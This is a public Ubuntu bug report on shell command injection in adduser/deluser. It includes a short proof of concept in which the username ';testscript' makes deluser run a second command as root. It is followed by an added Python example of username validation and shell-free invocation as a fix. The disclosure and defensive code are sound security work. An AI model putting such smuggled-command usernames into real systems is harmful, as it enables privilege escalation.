*** This bug is a security vulnerability ***
You have been subscribed to a public security bug by Marc Deslauriers
(mdeslaur):
The deluser program is vulnerable to command injection when a user has
been added via adduser with special characters (such as ';') in the
username. It is only possible when the user exists on the system (adduser
does not prevent usernames containing ';' from being added.)
This can be a security risk when user accounts on the system can be
created from arbitrary input, and there are exploitable programs in PATH
to make privilege escalation possible.
-------------- Proof of concept ----------------
# ll /test-file
ls: cannot access '/test-file': No such file or directory
# cat /usr/bin/testscript
#!/bin/bash
touch /test-file
# deluser
Enter a user name to remove: ;testscript
no crontab for root
crontab: usage error: no arguments permitted after this option
usage: crontab [-u user] file
crontab [ -u user ] [ -i ] { -e | -l | -r }
(default operation is replace, per 1003.2)
-e (edit user's crontab)
-l (list user's crontab)
-r (delete user's crontab)
-i (prompt before deleting user's crontab)
/usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1.
Exiting.
(failed reverse-i-search)`': deluser^C
# ll /test-file
-rw------- 1 root root 0 Jul 31 10:25 /test-file
-------- system description --------
Description: Ubuntu 18.04.2 LTS
Release: 18.04
# apt-cache policy adduser
adduser:
Installed: 3.116ubuntu1
Candidate: 3.116ubuntu1
Version table:
*** 3.116ubuntu1 500
500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
100 /var/lib/dpkg/status
** Affects: adduser (Ubuntu)
Importance: Undecided
Status: Incomplete
** Tags: adduser command deluser injection security
--
adduser & deluser shell command injection
https://bugs.launchpad.net/bugs/1838489
--
ubuntu-bugs mailing list
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
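The report above shows the two defects that combine here: adduser accepts a username containing shell metacharacters, and deluser later splices that username into a shell command line (`/usr/bin/crontab -r ;testscript`). The following Python is an added example, not code from the adduser package (which is written in Perl), showing the mitigation a maintainer would apply on both sides: reject usernames that do not match a conservative pattern before acting on them, and invoke crontab with an argument vector so no shell ever parses the name. The regular expression, the `-u user -r` invocation (taken from the crontab usage text in the report) and the `runner` parameter are assumptions made for this example.

```python
import re
import shlex
import subprocess
from typing import Callable, List

# Conservative username pattern (an assumption for this example, modelled on
# the default NAME_REGEX of Debian's adduser): a lowercase letter or underscore
# first, then lowercase letters, digits, underscores or dashes, 32 chars max.
# ';' and every other shell metacharacter fall outside it.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def is_valid_username(name: str) -> bool:
    """True only if the whole string matches USERNAME_RE."""
    return USERNAME_RE.fullmatch(name) is not None


def audit_usernames(names: List[str]) -> List[str]:
    """Return the names that would be rejected, e.g. when scanning /etc/passwd
    for accounts that were created before validation was enforced."""
    return [n for n in names if not is_valid_username(n)]


def build_crontab_remove_argv(user: str) -> List[str]:
    """Argument vector that removes a user's crontab.

    Contrast with the vulnerable shape in the report, a single string such as
    "/usr/bin/crontab -r " + user handed to a shell, where a name like
    ";testscript" terminates the crontab command and starts a second one.
    With an argv list the name is one argument to crontab, never shell input.
    """
    if not is_valid_username(user):
        raise ValueError(f"refusing to act on invalid username {user!r}")
    # '-u user -r' follows the usage text printed by crontab in the report.
    return ["/usr/bin/crontab", "-u", user, "-r"]


def remove_crontab(user: str, runner: Callable = subprocess.run):
    """Run the crontab removal without a shell. 'runner' is injectable so the
    function can be exercised without a real crontab binary."""
    argv = build_crontab_remove_argv(user)
    return runner(argv, shell=False, check=False)


def quote_for_shell(user: str) -> str:
    """Fallback for code paths that genuinely must build a shell string:
    shlex.quote wraps anything outside a safe character set in single quotes,
    so ';testscript' stays a single (invalid) argument rather than a command."""
    return shlex.quote(user)


if __name__ == "__main__":
    # Constructed sample names; ';testscript' is the name used in the report.
    sample = ["alice", "www-data", ";testscript", "bob;id", "Alice"]
    print("rejected:", audit_usernames(sample))
    print("argv:", build_crontab_remove_argv("alice"))
    print("quoted:", quote_for_shell(";testscript"))
```

Validating the name at creation time (adduser's side) stops the malicious account from existing at all; validating again in deluser and using an argument vector means that even an account created by some other tool with an odd name cannot turn into a command.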